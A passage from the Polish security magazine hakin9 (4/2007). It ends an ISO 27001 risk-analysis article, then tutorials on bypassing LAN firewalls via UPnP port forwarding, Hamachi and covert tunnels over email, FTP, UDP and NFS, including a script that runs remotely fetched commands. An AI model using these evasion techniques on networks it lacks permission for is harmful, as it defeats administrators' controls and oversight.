cyzje są podejmowane do roku.

Ryzyko nieakceptowane - Forum

Zarządzania Bezpieczeństwem In-
formacji podejmuje działania korygu-
jące i zapobiegawcze w czasie do 6
miesięcy.

Ryzyko krytyczne - Forum Zarzą-

dzania  Bezpieczeństwem  Informacji
podejmuje działania korygujące i za-
pobiegawcze w czasie do 3 miesię-
cy,  przeprowadza  audit  wewnętrz-
ny ISO 27001 we wszystkich obsza-
rach Urzędu, po 3 miesiącach prze-
prowadzana  jest  jeszcze  raz  anali-
za ryzyka.

Jednak, aby bardziej unaocznić

tą problematykę, przedstawimy sce-
nariusz realnej analizy ryzyka oraz
całego procesu, jaki się w związku
z nią odbywa.

Przykładowy scenariusz

Organizacja chcąca wdrożyć w
swych strukturach System Zarzą-
dzania

Bezpieczeństwem

Infor-

macji postanowiła rozpocząć pra-
cę od dokładnego oszacowania

Rysunek 1.

Spotkanie z kierownictwem organizacji

hakin9 Nr 4/2007

www.hakin9.org

Obrona

ryzyka, istniejących podatności, praw-
dopodobieństwa występowania zagro-
żeń oraz analizy ryzyka. Na początku
wdrożenia powołano, zgodnie z wyma-
ganiem normy, forum bezpieczeństwa
odpowiedzialne za nadzór nad proce-
sem  wdrożenia.  Do  prac  nad  analizą
ryzyka  zaproszono  zarząd,  wszyst-
kich dyrektorów pionów, informatyków,
służby ochrony. Wraz z konsultantami
z  zakresu  bezpieczeństwa  informa-
cji oraz bezpieczeństwa IT, zaczeli się
oni zastanawiać, czy i jakie wystąpiły
w przeszłości w organizacji incydenty
dotyczące  naruszenia informacji, awa-
rii  systemów  informatycznych,  zakłó-
ceń  związanych  z  bezpieczeństwem
fizycznym i środowiskowym w obsza-
rach organizacji. Po określeniu takich
incydentów, przeanalizowano raz jesz-
cze, jakie czynniki miały wpływ na ich
wystąpienie i jakie działania korygują-
ce i zapobiegawcze zastosowano, aby
nie dopuścić w przyszłości do ponow-
nego wystąpienia podobnych zdarzeń.
Analizując te dane wraz z powołanymi
specjalistami  z  zakresu  bezpieczeń-
stwa  informacji  i  bezpieczeństwa  IT,
zaczęto się zastanawiać, czy obecnie
zastosowane zabezpieczenia są ade-
kwatne  do  wagi  posiadanych  przez
przedsiębiorstwo informacji, aktywów,
procesów, obszarów i ludzi.

Wcześniej jednak konsultanci

przekazali wszystkim dyrektorom pio-
nów,  formularz  dotyczący  klasyfika-
cji informacji i aktywów, jakie znajdu-
ją się w organizacji, a jakie mają dla
nich  znaczenie  (prawne,  rynkowe,
strategiczne). Informacje zwrotne zo-
stały  dodane  do  szablonu  szacowa-
nia ryzyka. Wspólnie z całą powołaną
kadrą określono realne, istniejące po-
datności-tzw. „słabe punkty” w orga-
nizacji, mogące mieć wpływ na naru-
szenie bezpieczeństwa dla wymienio-
nych  informacji,  aktywów,  obszarów
czy procesów. W tym momencie kon-
sultanci  mieli  przygotowany  dokład-
ny szablon analizy ryzyka i mogli po-
dejść do jego szacowania. Na pierw-
szej  pozycji  pojawił  się  budynek  za-
rządu, jako ważny obszar, w którym
przetwarzane  i  przechowywane  są
najważniejsze informacje. Określono
dla  niego  kilka  realnych  podatności.

Były nimi:

•   Włamanie fizyczne do budynk
•   Pożar
•   Zalanie
•   Włamanie  fizyczne  do  pomiesz-

czenia zastępcy Dyrektora finan-
sowego

• Kradzież laptopów
• Sabotaż wewnętrzny ze strony

pracowników ochrony

Następnie  określone  zostały  prawdo-
podobieństwa  wystąpienia  realnych
zagrożeń  dla  tych  obszarów.  Uzna-
no,  że  należy  wzmocnić  ochronę  fi-
zyczną budynku poprzez zainstalowa-
nie lepszego monitoringu zarówno we-
wnątrz, jak i na zewnątrz budynku, po-
prosić przedstawiciela straży pożarnej
o jeszcze jedną analizę systemu prze-
ciwpożarowego i ewentualne wzmoc-
nienie  budynku  w  tym  obszarze.
W  przypadku  pomieszczeń  członków
zarządu,  ustalono,  że  zostanie  okre-
ślony  oddzielny  obszar  bezpieczny,
w  którym  znajdować  się  będą  biura
członków zarządu. Obszar ten będzie
oddzielony  za  pomocą  szklanej  ścia-
ny  z  drzwiami  na  zamek  magnetycz-
ny otwierany przez wprowadzenie sze-
ściocyfrowego  kodu  PIN.  Dodatkowo
przed obszarem, zostanie umieszczo-
ny sekretariat, który będzie wpuszczał
wyłącznie umówionych interesantów.

Kradzież laptopów z ważnymi da-

nymi jest dla każdej organizacji uciąż-
liwa, nie wiadomo gdzie dane te trafia-

ją.  Dlatego  też  ustalono,  że  zostanie
stworzona oddzielna, dość restrykcyj-
na  procedura  dotycząca  wynoszenia
sprzętu  komputerowego  poza  obszar
firmy, tak, aby zminimalizować ryzyko
jego  utraty.  Ponadto  ustalono,  że  zo-
stanie zakupiony odpowiedni sprzęt do
wzmocnienia  ochrony  tych  urządzeń
oraz  lepsze,  bezpieczniejsze  nośniki,
niesugerujące pochodzenia.

Jedynym problemem do rozwią-

zania  pozostał  ewentualny  sabotaż
wewnętrzny w firmie. Jest on niezwy-
kle trudny do udowodnienia, a jeszcze
trudniej znaleźć winnego tych działań.
Zarząd  zlecił  stworzenie  odpowied-
nich  procedur  związanych  z  zatrud-
nieniem  pracowników,  ich  rekrutacją
i weryfikacją posiadanych przez nich
kwalifikacji.  Ponadto  obecnym  pra-
cownikom  nakazano  podpisanie  sto-
sownych  oświadczeń  bezpieczeń-
stwa,  mówiących  o  ewentualnych
sankcjach  w  przypadku  udostępnie-
nia informacji, jej kradzieży, zniszcze-
nia  lub  zmodyfikowania  bez  zgody  i
wiedzy przełożonego.

Co prawda żadna organizacja

O autorze

Autor jest Product Managerem ds.
zarządzania bezpieczeństwem informa-
cji w Computer Service Support S.A.
Kontakt z autorem: tomasz.polacze-
k@css.pl

Rysunek 2.

Analiza ryzyka, czyli burza mózgów przeprowadzona z

kierownictwem organizacji

System Zarządzania Bezpieczeństwem Informacji

nigdy nie osiągnie 100% bezpie-
czeństwa, ale może je realnie zmi-
nimalizować.

Znając już dokładne sposoby, ja-

kie można wykorzystać do zminimali-
zowania zagrożenia, określamy praw-
dopodobieństwo jego wystąpienia na
podstawie incydentów, jakie wystąpi-
ły w przeszłości. Należy przy tym pa-
miętać, że logiczny jest wybór zabez-
pieczeń, których koszt nie przekro-
czy wartości aktywu, informacji, któ-
re chcemy zabezpieczyć.

Po określeniu tych wszystkich

czynników,  zarząd  miał  pełen  obraz
realnych  zagrożeń,  określił  przedział
czasu,  w  jakim  dane  zabezpieczenia
dla  określonych  obszarów,  aktywów
i  informacji  zostaną  wdrożone  i  mógł
przystąpić do wdrożenie całego Syste-
mu Zarządzania Bezpieczeństwem In-
formacji ISO 27001 w całej organizacji.
Poza  zastosowaniem  odpowiednich
zabezpieczeń,  możemy  również  za-

stosować inne metody. Jest to na przy-
kład unikanie ryzyka, czyli zastanowie-
nie się, w jaki sposób możemy uniknąć
ryzyka lub, przeniesienie samego ry-
zyka na inne obszary,czy procesy w
organizacji.

Podsumowanie

Opisana metoda, hipotetyczny scena-
riusz szacowania oraz analizy ryzyka
są jednymi z wielu możliwości. Na ryn-
ku istnieje wiele programów wspoma-
gających szacowanie ryzyka. Dlate-
go też ważne jest, aby podchodząc do
analizy ryzyka, wybrać najskuteczniej-
szą i najlepszą metodę, która dokład-
nie wpasuje się w organizację oraz jej
potrzeby. Należy również pamiętać, że
dane, jakie uzyskamy z analizy ryzyka,
posłużą nam później do formułowania
planu ciągłości działania organizacji w
przypadku katastrof i incydentów mo-
gących realnie w niej wystąpić. l

UWAGI

Należy  pamietać  że  dobra  analiza  ry-
zyka  powinna  być  przeprowadzana
indywidualnie  dla  danej  organizacji,
uwzględniając w niej realne zagrożenie
oraz  faktycznie  istniejące  podatności,
które mogą mieć realny wpływ na na-
ruszenie bezpieczeństwa zasobów in-
fomracyjnych organizacji.

Analiza ryzyka powinna być prze-

prowadzana  z  najwyższym  kierownic-
twem  organizacji,  kierownikami  po-
szególnych  działów,wydziałów,depar-
tamentów, pownieważ tylko wtedy bę-
dziemy mieć realny wgląd w istniejące
zabezpieczenia, podatności i zagroże-
nia, a nikt nie zna tak dobrze organiza-
cji jak ludzie w niej pracujący.

Na podstawie wyników z analizy ry-

zyka, możemy stworzyć sprawny plan
ciągłości działania biznesowego orga-
nizacji oraz odpowiednika dla informa-
tyki, disaster recovery

www.hakin9.org

hakin9 Nr 4/2007

Obrona

i pierwsi chcą kontrolować każde po-
sunięcie drugich. Z kolei użytkowni-
cy chcieliby mieć nieograniczony do-

stęp  do  wszystkich  usług  –  zwłaszcza  do
modnych ostatnio p2p. W zależności od po-
trzeb użytkowników administrator ma do dys-
pozycji różne narzędzia, za pomocą których
może przekierowywać porty, spiąć dwie sie-
ci lokalne lub zestawić tunel z komputerem w
Internecie  powodując,  że  będzie  on  widzia-
ny w sieci lokalnej. Dodatkowo musi mieć na
uwadze fakt, że istnieją techniki, za pomocą
których  bardziej  wykwalifikowany  użytkow-
nik  może  osiągnąć  podobny  rezultat.  Może
on mianowicie wejść w posiadanie narzędzi,
które  zniwelują  wysiłki  administratora  idące
ku ograniczaniu ruchu p2p oraz innych usług,
do  których  administrator  nie  chce  dać  użyt-
kownikom dostępu.

Spełniając zachcianki

użytkownika

Najczęściej użytkownicy sieci lokalnych chcą

hostować gry. Z punktu widzenia administra-
tora oznacza to ni mniej ni więcej to, że nale-
ży przekierować jeden lub więcej portów z in-
terfejsu zewnętrznego do sieci lokalnej. Moż-

na tego dokonać na parę sposobów. Pierw-
szym sposobem jest ręczna konfiguracja. Aby
przekierować port TCP wystarczy wydać po-
lecenie:

iptables -t nat -A PREROUTING -i IINT -p tcp --
dport PORT_DOCELOWY -j DNAT --to-destination
ADRES_W_SIECI_LOKALNEJ

Przegląd wybranych metod

niwelowania ograniczeń

sieci lokalnych

Konrad Malewski

stopień trudności

Istnieje wiele aplikacji, które do działania potrzebują publicznego

adresu IP. Jest szereg sposobów, aby umożliwić użytkownikom

wewnątrz sieci lokalnych korzystanie ze wszystkich zalet

publicznego IP. Można powiedzieć, że istnieje pewnego rodzaju

walka pomiędzy administratorami sieci komputerowych, a ich

użytkownikami.

Z artykułu dowiesz się...

• Jak przekierowywać porty z wykorzystaniem

urządzenia IGD.

• Jak samodzielnie lub z pomocą administratora

utworzyć wirtualną sieć.

• Jak stworzyć tunel IP wykorzystujący różne

protokoły wyższych warstw.

Co powinieneś wiedzieć...

• Powinieneś znać model ISO/OSI.
• Powinieneś mieć ogólne pojęcie o zasadzie

działania sieci TCP/IP.

• Powinieneś posiadać umiejętność administro-

wania systemem Linux na poziomie użytkowni-
ka.

Pakiety w tunelu

hakin9 Nr 4/2007

www.hakin9.org

gdzie  zamiast  IINT  podajemy  inter-
fejs wejściowy np. eth0, PORT_DO-
CELOWY  ustalamy  dla  konkretnej
usługi użytkownika, którego adres IP
w  sieci  lokalnej  to  ADRES_W_SIE-
CI_LOKALNEJ.  Dodawanie  i  usu-
wanie  przekierowań  tym  sposobem
jest  nieco  uciążliwe,  zwłaszcza  gdy
wielu użytkowników chce przekiero-
wać jeden port (co wiąże się z czę-
stym dodawaniem i usuwaniem wpi-
sów), lub nie chce aby przekierowa-
nie było permanentne.

Na szczęście można ten proces

zautomatyzować. W tym celu nale-
ży uruchomić demona UPNP (z ang.:

Universal  Plug  and  Play),  z  którym
będą komunikować się aplikacje klien-
tów  tj.  Windows  Messenger,  Emu-
le itp. Pierwszym krokiem idącym do
uruchomienia  IGD  jest  ściągnięcie,
skompilowanie i skonfigurowanie pro-
gramu demona ([1] oraz [2]). Plik kon-
figuracji  (o  nazwie  upnpd.conf)  znaj-
duje  się  domyślnie  w  katalogu  /etc.
Aby  uruchomić  program  przy  mini-

malnej konfiguracji należy ustawić po-
prawną  ścieżkę  dostępu  do  progra-
mu  Iptables.  Dla  celów  demonstra-
cyjnych należy również ustawić para-
metr duration tak, aby miał wartość in-
ną niż domyślna (np. 50) oraz ustawić
zmienną  debug_info  na  3.  Parametr
duration  określa  jak  długo  mapowa-
nie jest ważne. Po przekroczeniu te-
go czasu przekierowanie jest usuwa-
ne z routera.

Ostatnią rzeczą, jaką należy wy-

konać jest dodanie ście żki multica-
stowej do domyślnej tablicy routingu:

route add -net 239.0.0.0 netmask
255.0.0.0 eth0

Uruchomienie demona IGD sprowa-
dza się do wydania komendy:

./upnpd -f eth1 eth0

Jeśli nie użyjemy paremetru -f, de-
mon upnp uruchomi się w tle i nie bę-
dziemy widzieli komunikatów diagno-

stycznych.  Kolejne  parametry  pro-
gramu to nazwa interfejsu zewnętrz-
nego  oraz  wewnętrznego.  Po  uru-
chomieniu demona UPnP wszystkie
aplikacje,  które  działają  na  kompu-
terach  w  sieci  lokalnej,  a  są  zdolne
do  wykorzystania  zalet  IGD,  powin-
ny umieć wykryć obecność demona
i korzystać z jego funkcji.

Istnieje klient UPnP ([3]), za po-

mocą którego można ręcznie stero-
wać  przekierowaniami  na  routerze.
Program  ten  potrafi  automatycznie
wykryć  urządzenia  zgodne  ze  spe-
cyfikacją IGD. W tym celu wykorzy-
stuje protokół SSDP do wykrywania
urządzeń.  Nie  wgłębiając  się  zbyt-
nio w szczegóły zobaczmy, jak moż-
na ręcznie stworzyć przekierowanie
TCP  z  portu  5000  na  routerze  do
portu  22  na  kliencie.  Na  początku
sprawdzamy status połączenia – wi-
doczne na Listingu 1.

Powyższa odpowiedź oznacza, że

urządzenie UPnP działające na route-
rze, zostało wykryte. Dodatkowo pole-
cenie zwraca pewną ilość informacji
statystycznych oraz informacje o para-
metrach skonfigurowanego łącza. Na-
leży zwrócić uwagę na fakt, że para-
metry takie jak MaxBitRateDown nie
są wyliczane, a zwracana wartość jest
parametrem z pliku konfiguracyjnego.
Teraz przystąpmy do tworzenia prze-
kierowania za pomocą programu [3],
co można zobaczyć na Listingu 2.

Jest to równoważne wydaniu na-

stępującej komendy na routerze:

/sbin/iptables -t nat -I PREROUTING
-i eth1 -p TCP --dport 5000 -

Rysunek 1.

Prawdopodobna

konfiguracja firewalla

Listing 1.

Status połączenia

# ./upnpc -s

upnpc : miniupnp test client. (c) 2006 Thomas Bernard
go to http://miniupnp.free.fr/

for

more information.

UPnP device :
desc: http://192.168.64.254:49152/gatedesc.xml
st: urn:schemas-upnp-org:device:InternetGatewayDevice:1
UPnP device :
desc: http://192.168.64.254:49152/gatedesc.xml
st: urn:schemas-upnp-org:device:InternetGatewayDevice:1
getting

"http://192.168.64.254:49152/gatedesc.xml"

getting

"http://192.168.64.254:49152/gateconnSCPD.xml"

Connection Type : IP_Routed
Status : Connected,

uptime

=10548

MaxBitRateDown : 512000 bps MaxBitRateUp 512000 bps
Bytes: Sent: 490900 Recv: 34710590
Packets: Sent: 8881 Recv: 24517

Listing 2.

Tworzenie przekierowania

#./upnpc -a 192.168.64.100 22 5000 tcp

upnpc : miniupnp test client. (c) 2006 Thomas Bernard
go to http://miniupnp.free.fr/

for

more information.

UPnP device :
desc: http://192.168.64.254:49152/gatedesc.xml
st: urn:schemas-upnp-org:device:InternetGatewayDevice:1
UPnP device :desc: http://192.168.64.254:49152/gatedesc.xml
st: urn:schemas-upnp-org:device:InternetGatewayDevice:1
getting

"http://192.168.64.254:49152/gatedesc.xml"

getting

"http://192.168.64.254:49152/gateconnSCPD.xml"

ExternalIPAddress = 192.168.198.64
InternalIP:Port = 192.168.64.100:22
external 192.168.198.64:5000

redirected to internal 192.168.64.100:22

hakin9 Nr 4/2007

www.hakin9.org

j DNAT --to 192.168.64.100:22
/sbin/iptables -A FORWARD -p TCP -d
192.168.64.100 --dport 22 -j ACCEPT

Jeżeli na routerze został podniesio-
ny  poziom  logowania,  to  powyższa
informacja  powinna  zostać  wyświe-
tlona  na  ekranie.  Po  upływie  czasu
określonego  parametrem  duration
przekierowanie  zostanie  automa-
tycznie skasowane poprzez usunię-
cie  dwóch  wpisów  w  firewallu.  Przy
pomocy  programu  Upnpc  użytkow-
nik  może  także  usunąć  przekiero-
wanie  przed  upływem  czasu  dura-
tion,  oraz  wyświetlić  aktywne  prze-
kierowania.

Korzystając z rozwiązań opar-

tych  na  IGD  należy  mieć  na  uwa-
dze  nie  tylko  jego  zalety,  ale  i  wa-
dy,  przez  które  wielu  administrato-
rów  klasyfikuje  tego  rodzaju  urzą-
dzenia  jako  ryzyko  dla  bezpieczeń-
stwa  sieci  lokalnej.  Trzeba  sobie
zdawać  sprawę,  że  przedstawiona
wersja  IGD  została  zaprojektowa-
na tak, aby emulować ICS (Microso-

ft's Internet Connection Service) i ro-
bi to bardzo dokładnie. Oznacza to,
ni mniej ni więcej, tyle, że odpowie-
dzialność za bezpieczeństwo i celo-
wość przekierowań zostaje przenie-
siona  na  użytkowników  bramy.  Da-
je to potencjalnemu intruzowi możli-
wość  bezproblemowego  przegląda-
nia, dodawania oraz usuwania prze-
kierowań.  Więcej  szczegółów  tech-
nicznych czytelnik może znaleźć na
forum UPnP.

Na potrzeby nie tylko graczy,

ale  również  użytkowników  chcących
uniezależnić swoją wirtualną sieć od
lokalizacji  poszczególnych  węzłów
zostało  stworzone  oprogramowanie
łączące  w  sobie  VPN,  aplikacje  p2p
oraz prosty system IM. Narzędzie to,
noszące nazwę Hamachi [5], dostęp-
ne  jest  zarówno  dla  systemów  spod
znaku pingwina, jak i Windows. W te-
legraficznym  skrócie  można  powie-
dzieć, że tworzy ono sieć lan w opar-
ciu o Internet. Konfiguracja programu
w systemie Linux jest bajecznie pro-
sta. W systemie z Readmont konfigu-
rowanie aplikacji przysparza jeszcze
mniej problemów. Program jest dość
nowatorski  w  swoim  działaniu.  Przy
instalacji  aplikacji  tworzony  jest  do-
datkowy interfejs sieciowy, przez któ-
ry  będą  wykonywane  połączenia  do
komputerów w wirtualnej sieci. Klient
po uruchomieniu rejestruje się w sys-
temie.  Dodatkowo  przeprowadzana
jest dwukierunkowa autentykacja za-
równo  serwera  jak  i  klienta.  Każdy
serwer Hamachi posiada parę kluczy
– publiczny i prywatny, służących do
potwierdzania  autentyczności.  Klu-
cze  publiczne  są  zawarte  w  progra-
mach klientów. Klient Hamachi gene-
ruje  swoją  parę  kluczy,  a  jego  klucz
publiczny  udostępniany  jest  serwe-
rom  w  celu  przeprowadzenia  póź-
niejszej autentykacji kolejnych podłą-
czeń klienta. Przy pierwszym urucho-
mieniu klienta należy stworzyć nową
wirtualną sieć, lub dołączyć się do już
istniejącej.  Każdy  komputer  w  takiej

sieci  posiada  swój  pseudo-publicz-
ny  adres  IP.  Zakładając,  że  mamy
skonfigurowanego  wcześniej  klienta
Hamachi,  kolejnym  etapem  przy  je-
go  uruchamianiu  jest  synchronizacja
z innymi klientami należącymi do wir-
tualnych  sieci.  Oznacza  to  stworze-
nie tunelu UDP pomiędzy komputera-
mi w sieciach lokalnych i wykorzysta-
nie go jako nośnika danych do enkap-
sulowania innych protokołów. Do ze-
stawienia tunelu i przebicia NAT wy-
korzystywany jest komputer–pośred-
nik zwany często mediatorem. Szcze-
góły  techniczne  tego  procesu  moż-
na  poznać  np.  w  artykule  Sieci  nie

tak znowu lokalne z Hakin9u 1/2007.
Warto jednak wiedzieć, że media-
tor jest wykorzystywany jednokrotnie
– przy przebijaniu NAT.

Dodatkową cechą węzłów łączą-

cych hosty w Hamachi jest szyfrowa-
nie przesyłanych danych. Niektórych
zdziwić  może  fakt,  że  w  celu  otrzy-
mania  możliwości  przesyłania  da-
nych w postaci niezaszyfrowanej na-
leży wykupić konto premium u produ-
centa. Aplikacja ta likwiduje wszyst-
kie problemy związane z sieciami lo-
kalnymi  posiadającymi  niepubliczne
adresy  lokalne.  Jednak,  jak  by  tego
było mało, Hamachi posiada wbudo-
wany serwer proxy, za pomocą któ-
rego  można  korzystać  z  Internetu
wykorzystując zdalny komputer.

Z perspektywy administratora

sieci komputerowej zablokowanie te-
go typu usługi może być bardzo po-
żądane. Niektóre z serwerów po-
średniczących Hamachi używają do
synchronizacji portu 32976. Aby za-
blokować możliwość połączenia z ty-
mi hostami wystarczy dodać nastę-
pującą regułkę w firewallu:

iptables -I FORWARD -p tcp --dport
32976 -j DROP

Powinno  to  uniemożliwić  synchro-
nizację  z  częścią  serwerów  Hama-
chi, jednak nie zlikwiduje to całkowi-
cie łączenia się z ową siecią. Aby w
pełni zablokować sieć należy, tak jak
w  przypadku  niektórych  sieci  p2p,
sprawdzić  adresy  IP  pośredników  i
wpisać je do firewalla. W chwili pisa-
nia tego artykułu wystarczyło oprócz

Rysunek 2.

Schemat komunikacji poprzez serwer pocztowy.

Pakiety w tunelu

wyżej wymienionej reguły zabloko-
wać jeden adres IP, z którym klient
Hamachi łączył się na porcie 443:

iptables -I FORWARD -d 63.208.197.211
-j DROP

Tunelowanie,

enkapsulacja – IP

w czymkolwiek?

Duża część administratorów konfigu-
ruje firewalle w ten sposób, że zna-
ny ruch np. SSH, HTTP, FTP, SMTP
nie jest dokładnie analizowany przez
reguły firewalla, a pozostałe pakiety
przepuszczane są na przykład przez
filtry wykrywające ruch p2p, ograni-
czana jest liczba równoczesnych po-
łączeń, czy w końcu niektóre porty
są całkowicie blokowane. Tak skonfi-
gurowanego firewalla można obejść
w sposób, jaki od razu przychodzi
na myśl – należy ukryć interesujący
nas ruch w pakietach, które będą za-
klasyfikowane na firewallu jako zna-

ny ruch (patrz Rysunek 1).

Jednym z takich programów jest

Mailtunnel  [6].  Ten,  pochodzący  z
1999  roku,  program  składa  się  z
trzech  skryptów  napisanych  w  Per-
lu.  Jego  działanie  polega  na  ukry-
waniu  danych  połączenia  w  wiado-
mościach  email,  zaś  konfiguracja

sprowadza się do edycji pliku conf.pl.
Celem dla którego powstał program
jest stworzenie ukrytego kanału po-
między  komputerem  A,  który  znaj-
duje  się  w  sieci  lokalnej  (załóżmy,
że w danej sieci administrator prze-
puszcza  tylko  pocztę  email),  a  ho-
stem  B,  który  po  odebraniu  przesy-
łek od A, przesyła dane do kompute-
ra C poprzez stworzone połączenie
TCP.  W  efekcie  A  łącząc  się  do  lo-
calhost:port połączy się z kompute-
rem C. Aby skomplikować przykład,
załóżmy że A oraz B znajduje się za
NAT,  a  MTA,  którego  używają  oba
komputery znajduje się w jeszcze in-
nym miejscu (patrz Rysunek 2).

Naszym celem będzie zesta-

wienie połączenia VPN pomiędzy A
oraz B. Pierwszym krokiem będzie
założenie konta email. Od skrzyn-
ki email wymaga się w zasadzie tyl-
ko tego, aby była szybka, umożliwia-

ła obsługę przez POP3 i SMTP oraz
nie  posiadała  filtru  antyspamowe-
go,  który  usunąłby  niektóre  pakiety
z  konwersacji.  Załóżmy,  że  na  ho-
ście o adresie 192.168.198.200 zało-
żone zostały dwie skrzynki: mtn_re-
lay1 oraz mtn_relay2. Kolejnym kro-
kiem jest skonfigurowanie Fetchma-
ila na komputerach A oraz B.

Na hoście A plik konfiguracyjny

.fetchmailrc powinien zawierać:

set daemon 1
poll 192.168.198.200 with proto POP3
user 'mtn_relay1' there with password
'mtnrelay1' is 'mtn' here

natomiast na komputerze B:

set daemon 1
poll 192.168.198.200 with proto POP3
user 'mtn_relay2' there with password
'mtnrelay2' is 'mtn' here

Rysunek 3.

Tunelowanie danych TCP w UDP.

hakin9 Nr 4/2007

www.hakin9.org

Jeżeli  ktoś  preferuje  korzystanie  ze
środowiska  graficznego,  może  użyć
programu Fetchmailconf do uzyska-
nia  podobnego  pliku  konfiguracyj-
nego.

Po wpisaniu polecenia fetchma-

il jako użytkownik mtn na kompute-
rze A oraz B poczta skierowana do

mtn_relay1@[192.168.198.200] po-
winna trafiać do /var/spool/mail/mtn
na A. Podobnie email wysłany do

mtn_relay2@[192.168.198.200]  tra-
fi do komputera B. Na obu kompute-
rach fetchmail odpytuje serwer pop3
co  1  sekundę.  Kontroluje  to  liczba,
która  znajduje  się  za  słowem  de-

amon w pliku konfiguracyjnym.

Program Mailtunnel został przy-

stosowany  do  tunelowania  teksto-
wych  danych.  Aby  go  dostosować
do  wiadomości  binarnych  należy  w
miejsce  operatorów  wczytania  linii
„<..>”  użyć  funkcji  read.  Zmodyfiko-
wany program znajduje się na [7].

Aby skonfigurować VPNa należy

sięgnąć po przepis z numeru Hakin9
6/2006 autorstwa gosub-a. Jeśli jed-
nak zależy nam na prostszej wersji tu-
nelu, w którym szyfrowanie odbędzie
się  poprzez  współdzielony  klucz,  to
możemy  pójść  nieco  na  skróty.  Na
jednym  z  komputerów  generujemy
klucz openvpn-owy poleceniem:

openvpn --genkey --secret key

następnie w sposób, który uniemożli-
wiłby podsłuchanie transmisji, kopiu-
jemy plik key na drugą maszynę. Po
czym na maszynie B wydajemy po-
lecenie:

openvpn --dev tun1 --ifconfig 10.4.0.2
10.4.0.1 --verb 5 --secret key --proto
tcp-server --port 666

które  uruchomi  serwer  VPN  na-
słuchując  na  gnieździe  TCP  i  por-
cie  666.  Mając  już  działający  ser-
wer VPN należy uruchomić program
forwardujący pakiety z serwera VPN
poprzez email do klienta:

./mtn forward localhost 666

Na hoście A uruchamiamy klienta tu-
nelu:

./mtn listen 5000

oraz klienta VPN:

openvpn --remote 127.0.0.1 --dev
tun1 --ifconfig 10.4.0.1 10.4.0.2 --verb
5 --secret key --proto tcp-client --
port 5000

Po paru chwilach możemy cieszyć
się tunelem zestawionym pomiędzy
komputerami A oraz B – Listing 3.

Jak możemy się domyślać, przez

takie  połączenie  nie  da  się  komfor-
towo  grać  w  Quake'a,  lecz  dla  ce-
lów  SSH  w  zupełności  ono  wystar-
czy. Biorąc pod uwagę zasadę dzia-
łania przesyłek email można od razu
wpaść na pomysł routingu opartego
o  emaila.  Za  pomocą  przekazywa-
nia poczty można skomplikować dro-
gę pakietu unikając wścibskich oczu
administratorów,  rządu,  terrorystów,
żony etc... Ponadto zastosowanie ta-
kiej techniki jest słuszne w przypad-
ku, gdy wiemy, że kierowanie poczty
do konkretnego hosta w sieci będzie
szybsze, niż wysyłanie emaili do in-
nego. Tworząc większą liczbę skrzy-
nek pocztowych, które przekazywa-
łyby pomiędzy sobą wiadomości, po-
wodowalibyśmy, że pakiet skierowa-
ny z komputera A do C przechodził-
by przez szereg MTA.

Do kompletu protokołów braku-

je już jedynie tunelowania za pomo-
cą FTP. Jednym z programów, które
częściowo  tego  dokonują  jest  Ftp-
tunnel  [8].  Program  ten  jest  raczej
aplikacją typu proof of concept, niż
programem do tunelowania. Składa
się  on  z  czterech  skryptów.  Jeden
z  nich  (master.pl)  należy  umieścić
w  katalogu  głównym  serwera  FTP.
Po  uruchomieniu  stworzy  on  pliki
semaforów,  których  będzie  ocze-
kiwał  program  klienta,  a  następnie
poprosi  o  wprowadzenie  komendy,
która  zostanie  zapisana  do  pliku  o
nazwie  request.  Na  drugiej  maszy-
nie wgrywamy plik slave.pl i modyfi-
kujemy jego część, w której wskaza-
ny jest serwer FTP, nazwa użytkow-
nika i hasło. Skrypt slave.pl zalogu-
je się na serwer, pobierze plik requ-

est, wykona go, a wynik zapisze do
pliku answer, który następnie zosta-

nie umieszczony na komputerze, na
którym uruchomiony jest skrypt ma-
ster-a.

Program ten posiada wiele bra-

ków, lecz wydaje się, że przy odro-
binie  pracy  uda  się  za  pomocą  tej
techniki  stworzyć  połączenie  VPN
pomiędzy dwoma komputerami. Naj-
prawdopodobniej modyfikacji nie po-
winno być dużo jeśli użyjemy progra-
mu  Socat  [9],  za  pomocą  którego
możemy  przekazywać  dane  pomię-
dzy  dwoma  niezależnymi  źródłami,
począwszy od gniazd, poprzez pliki,
a skończywszy na serwerach proxy.

Tunel IP poprzez

zbiory w sieciowym

systemie plików

Skoro już wspomniałem o programie
Socat, trudno nie przytoczyć w tym
miejscu jego niewątpliwych zalet, za
pomocą których możliwe jest zesta-
wienie dowolnych tuneli. Na przy-
kład, aby osiągnąć podobny efekt,
jak w artykule Hakin9 „Tunele TUN/
TAP w systemach Linux/Unix” z lute-
go 2007, można na komputerze zdal-
nym uruchomić polecenie:

socat udp4-listen:53 tcp4:127.0.0.1:
5000

natomiast na komputerze za firewal-
lem:

socat tcp4-listen:5000 udp:
adreskomputerazdalnego:53,sourceport=53

Teraz posiadając działające połą-
czenie TCP (patrz Rysunek 3) po-
między dwoma komputerami, widzia-
ne na routerze jako szereg pakietów
UDP, można użyć pakietu Openpvn
do stworzenia tunelu.

Jak zostało wspomniane wcze-

śniej,  Socat  umożliwia  wykorzysta-
nie plików jako źródła danych. Mając
to  na  uwadze,  nietrudno  wyobrazić
sobie, jak za pomocą tego programu
można stworzyć prosty tunel w opar-
ciu o zdalne zasoby NFS. Do zesta-
wienia tunelu VPN potrzebny będzie
nam dodatkowy programik o nazwie
Udprelay [10]. Dodatkowo trzeba bę-
dzie  lekko  zmodyfikować  jego  źró-
dła. Mianowicie w pliku udprelay.c w

Pakiety w tunelu

hakin9 Nr 4/2007

www.hakin9.org

linijce 353 przed komendą bind nale-
ży wstawić:

if (setsockopt(sock,SOL_SOCKET,
SO_REUSEADDR,&one,sizeof(one))<0)
{
syslog (LOG_ERR, "setsockopt, %m");
exit (1);->
}

Pozwoli  to  na  przypięcie  dwóch
gniazd do tego samego portu. Mając
zmodyfikowany i skompilowany pro-
gram,  możemy  przystąpić  do  two-
rzenia  tunelu.  Schemat  komunikacji
po NFS obrazuje Rysunek 4.

Rolą maszyny B jest jedynie udo-

stępnienie jednego katalogu poprzez
NFS. W tym katalogu znajdują się
dwa pliki hostA-hostC oraz hostC-

hostA.  Pierwszy  z  nich  będzie  uży-
ty  do  jednokierunkowej  komunika-
cji od hostaA do hostaC. Do łączno-
ści w drugą stronę wykorzystany zo-
stanie drugi plik. Załóżmy, że kompu-
ter A oraz C mają skonfigurowanego
klienta NFS i zamontowany synchro-
nicznie  katalog  /mnt/nfs  komputera
B  w  katalogu  /mnt/nfs-remote.  Aby
przedstawione  na  rysunku  połącze-
nie zaczęło działać, należy wykonać
następujące sekwencje komend. Na
początku uruchamiamy serwer ope-
